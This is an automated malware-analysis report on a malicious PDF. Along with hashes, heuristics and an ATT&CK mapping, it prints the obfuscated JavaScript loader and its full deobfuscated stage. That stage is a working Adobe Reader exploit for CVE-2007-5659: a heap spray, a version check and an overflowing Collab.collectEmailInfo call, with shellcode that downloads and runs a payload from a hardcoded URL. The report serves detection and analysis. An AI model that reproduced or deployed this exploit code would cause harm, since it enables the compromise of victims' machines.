Malicious PDF — malware analysis report

Static analysis result for SHA-256 457b2717a35d3ab7…

MALICIOUS

PDF

4.7 KB Created: 2008-08-06 01:42:27 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 421655e1acb894466106c59801bcd8c6 SHA-1: 46f7e86c8bfe6be99d51587ba6ee4077c4025534 SHA-256: 457b2717a35d3ab7d4002d77e3183c0375708e2813a22b424b0b3a5c03e2d695
290 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. A high-severity PDF_EVAL heuristic firing suggests the use of eval(), which is commonly used to deobfuscate and execute malicious code. The extracted JavaScript stream, named javascript_obj0013_001.js, is heavily obfuscated, making its exact function difficult to determine, but the presence of eval() strongly implies it's intended to download and execute a second-stage payload. The file's authoring application is Scribus, which is not inherently suspicious, but the embedded, obfuscated JavaScript is a significant indicator of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function VfJOa(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function uF7295nWabJ(HZL8YcEEFHhgWq){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(HZL8YcEEFHhgWq)"+";"+"}");eval("function YuAiv8F6Sa2(fKbqo){var kc4TRE0Sg5q="+"0,bH5TTZpOf=fKbqo.l"+"en"+"gth,uwwLq75mEJrg=10"+"2"+"4,B0tDlk2NAJRdn,CChzwdwHU,GGGe8xY1='',AEsCGFNZh=kc4TRE0Sg5q,ViUaPUW4=kc4TRE0Sg5q,JXS0ojowgMxno=kc4TRE0Sg5q,y2RvO2cPOLt=Ar"+"ra"+"y(63 …
  • PDF exploit shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://abb192.cn/exp/load.php?id=3115&spl=4 Referenced by PDF JavaScript

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x363 6618 bytes
SHA-256: 57ad9c449ff78eca758055b21eee99a8aa1314e6c4d156b0d5846fb5295b3a62
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function VfJOa(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function uF7295nWabJ(HZL8YcEEFHhgWq){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(HZL8YcEEFHhgWq)"+";"+"}");eval("function YuAiv8F6Sa2(fKbqo){var kc4TRE0Sg5q="+"0,bH5TTZpOf=fKbqo.l"+"en"+"gth,uwwLq75mEJrg=10"+"2"+"4,B0tDlk2NAJRdn,CChzwdwHU,GGGe8xY1='',AEsCGFNZh=kc4TRE0Sg5q,ViUaPUW4=kc4TRE0Sg5q,JXS0ojowgMxno=kc4TRE0Sg5q,y2RvO2cPOLt=Ar"+"ra"+"y(63,9,0,6,46,47,48,16,22,39,0,0,0,0,0,0,12,7,2,15,51,29,26,24,23,18,32,25,55,19,57,38,43,27,17,11,44,53,35,36,60,5,40,0,0,0,0,4,0,59,28,1,56,33,30,45,52,10,14,8,13,41,62,3,34,61,54,49,20,21,58,50,31,42,37);f"+"o"+"r(CChzwdwHU=M"+"at"+"h.c"+"ei"+"l(bH5TTZpOf/"+"uwwLq75mEJrg)"+";CChzwdwHU>kc4TRE0Sg5q;CChzwdwHU-"+"-){fo"+"r(B0tDlk2NAJRdn=Ma"+"th.m"+"in(bH5TTZpOf,uwwLq75mEJrg);B0tDlk2NAJRdn>kc4TRE0Sg5q;B0tDlk2NAJRdn-"+"-,bH5TTZpOf-"+"-){JXS0ojowgMxno|"+"=(y2RvO2cPOLt[fKbqo.cha"+"rCod"+"eAt(AEsCGFNZh+"+"+)-48])<"+"<ViUaPUW4;if(ViUaPUW4){GGGe8xY1+"+"=uF7295nWabJ"+"(108^JXS0ojowgMxno&"+"2"+"5"+"5);JXS0ojowgMxno>"+">="+"8;ViUaPUW4-"+"="+"2;}el"+"se{ViUaPUW4="+"6"+";}}"+"}return (GGGe8xY1);}var FNVonJLFSAzG=implode('',['@mRof6t','iKqBciXBHBte','29doMRsW','21T','c','M','gdeAltcRYEYMiW','e2CJR','cok2','MmJ7Y','h_B3','_gs','8KzBkt','eRB','vWo8ZGD','i2','s_30WUHnX','e','kYshY@','gccY27B@Rh3Q','zuiJ','7Y31ZMjG','epl','Pk_21k6BG','7JR','fcY','30WU','HnXekYEs','3QzuiJ7Y','31ZMjGep','lP6hRRsh3Qzu','iJ7Y31','ZMjGeplPbu_@','g','s8KzBkteRBvWo8ZGD','i@YYMQTu8m2','BuGWJj','NJYirT','p7xWe','oxJeA','Yk6','B','_sY7GXM8','xNDAp@WHYEY','MfW23Kd','e2@gs8K','zBkteRBvWo8ZGD','iHst','_@m73BX','23Y','@','J2@ucj','vTRHx6s8ET','RSKRI1_u_MH6W','3l','dcM3@6','Cu','d','zH','y7si_dz','1uz','cMRs_Ht','6Uobq2HC6UoH','sW3','ldc','MOdcHhk2MRst','3B','W6ACh2A17WM','1z','c8xeUH1','zc8xeUH1zc8xeUH1z','cHyWpS1z','sHxzzS','1ze','8FqIu1zcub','N','Iu1zcubsuH','1zRiyXUH1z','Rif','eUH1zRi4ZI','S','1zRi','tsu81','ze','iyWwS1zeiyZpi1zcu','4','Tzi','1zciyJui1z','Ri','yWp','i','1','z','e8Gzpi1','zRixUpi1z','RuyZY81zc','8f','mwH1zRuyZ','Y81ze','8mWw8','1','z','Riy6UH1','zR','iyWpS1','ze','8Gzpi1','zeSusUH1ze8ERU8','1zRiEUIH1zcHQsUH1z','Riyhu','H1','zRi','y','Wpi1','zRSgZz81zeS','uz','pS','1zs8QRU8','1ze8KUuH1zcHQz','IH1','zR','iyhz','i1zRiy','Wpi1z','RSgZz81zeSuzw81z','sSg7U81zR','Hbzzi','1','zcHQNYi1zR','iy6Yi1','zRiyWpi1','z','RSgZz8','1zeSuz','wH1','z','c','H','bR','U81','zcHyduH1','zc','HQ','Rzi1zRi','yXzS1zRiyWpi1zRS','gZz81z','eSumpi1zeH','m7','U8','1zcHgtz81zcH','QzU81zRiyduu1zRiyW','pi','1zRSg','Zz81zR','S','yZ','pS1z','ciQmzi1zRugd','US1','ze8F','Uu81','zei','QU','IS1zRitsz8','1zRi','yWIi','1zeSEzpi1zRugZz8','1z','e8Gqp','S1z','Ri4hI','S','1','zRim','7u81ze8GNp','8','1ze','iQ','NI','S1zcHQ','NIu1zRiyZY81zRiyWpi1z','cu','QNpi1zeiKeIu1z','RuyXBH1zs8tsU81z','RiyW','pi1ze8Fzp','i','1','ze','ix','UIS1zeHgZ','Y81zeHyZ','US1ze8FNp','i','1','zs','Syh','I','S','1zR','HbRU81zRi','yWpi1zeSyWpi1zRSgZY','81','zcuKmp','S1ze','SFz','Bi1zeSgZY81','zcHQ','mw81zRiy7ui1zRiy','Wp','i1zR','SgWwS1zeHt','qpi1zeSxz','pi','1','z','s','SE','uuH1zeHtRuS1','zRi4hpi1zcugtU','8','1zRi','yWp','i1zRughYH1','ze8G','qpi1','zRix','UIS','1','z','Ri','m7u81ze8GNp8','1zeiQNIS1z','RSy6U8','1z','RiyW','pi1zcuKzp','i','1zeSQzB','u1z','RSgWw','S','1zci5XpS1zeS5XY81zRHbNwS1zs','S','ytuS1','z','eS5d','pi1','zR','S','gZY81zcuKmwH1ze','S','FzIS1zeS','gZY81z','cHQ','mw81zRiyX','wS1','zRiyWp','i1zRiy7u81','zRugh','YH1z','e','8Gqpi1zR','iQUIS1zRiZ7u81ze8','GN','p8','1zeiQNIS1zeiy6U','81zRiyWpi','1zcuKzpi1ze','8GUYH1zeiyh','IS','1zRim7u81','ze8','GNp81zeiQNIS1zRiy6U81','zR','iy','W','pi1zRSmWpi1','z','eSZdB81zc','HmWwS1','zc','HmWw','S1zcH','mWwS1','zcH','m','WwS1zcHxmUS','1','zeSKzp','S1ze8GNwS1zcH','ZXu','81z','eSZhYu1zcHyhY','H1ze8GNI','S1','ze8GsUH1','zRiQ','uzH','1zeS','fmY','8','1','zeSuz','w','H','1','zRu5ZY81ze8Ge','wH1zei','EuzS1zRi5tU81zeSu','UUS1zRuumY81zRi5Xpi','1zci5hUS1zR','S','F','Nz81zc8fUIi1ze','H5WwS1zci5dIu1z','RibUuu1zeiyWuH1z','RHZJI81zRiQuz','S1z','eHE','Nui1zRi5WpH1zRSyhYi1zRH','m','6Y8','1zR','HE','eB81z','RugdIH1zeSKs','uS1zcHGmY81zeSKmY','81zRi5XpS1','zcuuqzH1','zR','i','xmY81','ze8GUB81ze','ixNI81z','sHfzw','S1zR','i','4ZY','8','1zR','i','5ZY81ze','S','ENuS','1','ze','HZdpH1zRiyWw','81zRH46U','81zRHbUu','H1zeSghYH1zRSxNB','i','1','zR','SbUpH1zRiy','h','I','H','1zs8GmYu1z','s8bg','Y81z','e','HyXuS1ze','8E','Nz','i1z','e8fmzH1','zsH','uquH1','zeHmXzH1ze','8mZUH1ze8KN','zi','1zs8b','g','Y','u1','ze85d','z','i1','ze','8Emzi1z','eHmZY','8','1ze','8tgY','H','1','zs','HyTYH','1z','e8','Gmuu1zsHxq','Yi','1zsHEq','uH1ze','HF','qu81z','s8bgUH1zsHZZU','S1z','cHbqY','8j','uhu@mRof','6WA','r','2','6','c','lkJYhJYcr_BMRs_HtJ','YHbs','YH','bEYMFhJA@l6','Hf2w','SV6zko6','tt@KpAbR','V2Bc7BB','T','23_6','WR@NUu@mRof6','_3','0WUHnXek@YYM','fGo2AhJ28','7o8_GMk@','Y_','M','_l6','Hf2wSV6zkob_H','tXYuY','EYMFh','JA','@','gs8','KzB','kteRBvWo','8ZGDi','@YYMKk7BxX7o','bW2Rjzt','3us','uubzt','3us','uub','NtR','Hsh3QzuiJ7Y31ZMj','G','epl','P6tt@zBB','u7MkG7h3QzuiJ7Y31ZMjG','eplP2_','MGXM8','xNDApthu@m','Ro','f6_2Fc','BuXXwA3teC','N6tt@RWcoXMYfNz','it','T','BcfK','I','uK6t','7@sYYGsY','HbsYHYlW','Ar26clkJYhJ','Yc','r_wu@m62f6_RFhJA@UoBWTpl0bIAA_Y','HH','UoBWTpl0bIA','A2Y2FcBuX','XwA3teCNbuC','k7w','irXD1Eb6RAu_','MH6','tiK','qBciXBHBte29','d','DlqJ','21PGDC9hscs6tt','@','gs8KzBkteR','Bv','Wo8ZG','D','i@','E_MO','dc','Hhk','6u@','YcMR6WBKk6oGt62B6WjWt7','oJ','7tR@E','cMFhJA@UI','cP','W6ct','stt@U2AbkW3Y','W631de','j','1dsAY@','J','2Bes','2','0JeAY','k6B_','uhu@UIcP','W6','cts','tt@UIcPW6c','t1WA16','c2','lX7B_l_@Z@hB2NWM','YEYMFhJ','A','@uDjbcB','kQh','u','Cztu','A','Nhzl','@YYMBW','63@UpAf','h','7Y_UIcPW6ct1h','o_hJ','AgJcRbu','_','7g','t6i1','b2','uBq2','cl','dRSG7','tHY','c','tS','YTIB','A7','z7C77ofhB3_NuR','YEYMY','Z2M_R','tla6YkJTRH','qtIuEW','MHrboHs6ttRs_','u@mWI@R_RUToHJ2w3EUM','1u','URjEK','DlEYoMRYY','MEsW','Ii','s','tla6YkJT','RHqtI','uE','WMHrb','VH','s6_t@N','uR@cc','_@u','DjbcB','kQhuCztuANh','zlL','hu@@cYMEu','tR@c','c','_@Rtla6','YkJT','R','Hqt','I','uEW','MH','rboHs6ttRsh8@','mWI','@uDjbcBkQhuCzt','uANhzl','Lh','u','@@c','YMEu_M72cM_uDjbcBk','Qh','uCztuAN','hzlL','6u@','@cYMQutR@EcMu','JVj','QhUA','bTuAQhI8WtBRYEYMFhJ','A@','1B','85ZokKZYcJ6tt@ze','2','1X','sol6R','B_NtIK6','Uob','q7','IK6UobqJMYE','YMQ7','7c2W2','RpJUSv2','I','3FR2kB','c7BBT23_6_t@eY8uzzHY','sWkGqpjJWe','8_2BMAYY','MpJ','U','Sv2I3FR2kHs_3_t6ABq62227oj','Xo3odRB@YYM','5@222hJoBq','62227BCJRich7c2t','p2i','@2R','HXR3jGJu','@','NWM2Y','6ASGYMpJUSv2I3FR2kRthu@YcMR6Wj','Wt7oJ7t','RHc']);");eval(YuAiv8F6Sa2(FNVonJLFSAzG));}
generic_stage_recovery_000.js deobfuscated-js generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x363 2638 bytes
SHA-256: c0231cb35b4a72ecb1429c0c272d34a5794028ea537bed4226ec20e2f540c106
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var E5ChfC0nynKR = new Array(); function EdyXMt(w75EL8teVU4DZG, tS53RsN) { while (w75EL8teVU4DZG.length*2<tS53RsN){w75EL8teVU4DZG += w75EL8teVU4DZG;} w75EL8teVU4DZG = w75EL8teVU4DZG.substring(0,tS53RsN/2); return w75EL8teVU4DZG; } function yTVw1sp7qwA5HI() { var joSy22FxGh2J9u = 0x0c0c0c0c; var Jr0Xn = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u612F%u6262%u3931%u2E32%u6E63%u652F%u7078%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u333D%u3131%u2635%u7073%u3D6C%u0034"); var rZlkanzX4hZM = 0x400000; var o3rLCO0No = Jr0Xn.length * 2; var tS53RsN = rZlkanzX4hZM - (o3rLCO0No+0x38); var w75EL8teVU4DZG = unescape("%u9090%u9090"); w75EL8teVU4DZG = EdyXMt(w75EL8teVU4DZG, tS53RsN); var l6L8PCsjyRU = (joSy22FxGh2J9u - 0x400000)/rZlkanzX4hZM; for (var QdHGZSKqk=0;QdHGZSKqk<l6L8PCsjyRU;QdHGZSKqk++) { E5ChfC0nynKR[QdHGZSKqk] = w75EL8teVU4DZG + Jr0Xn; } } function VHiaL() { var AiGek8 = app.viewerVersion.toString(); AiGek8 = AiGek8.replace(/\D/g,""); var YW0LLw1QI9qU1Z = new Array(AiGek8.charAt(0),AiGek8.charAt(1),AiGek8.charAt(2)); if ((YW0LLw1QI9qU1Z[0] == 8 && ((YW0LLw1QI9qU1Z[1] == 1 && YW0LLw1QI9qU1Z[2] < 2) || YW0LLw1QI9qU1Z[1] < 1)) || (YW0LLw1QI9qU1Z[0] == 7 && YW0LLw1QI9qU1Z[1] < 1) || (YW0LLw1QI9qU1Z[0] < 7)) { yTVw1sp7qwA5HI(); var N4CVLu6hL = unescape("%u0c0c%u0c0c"); while(N4CVLu6hL.length < 44952) N4CVLu6hL += N4CVLu6hL; this.collabStore = Collab.collectEmailInfo({subj: "",msg: N4CVLu6hL}); } } VHiaL();

Open this report in the interactive analyzer, or submit your own file for analysis.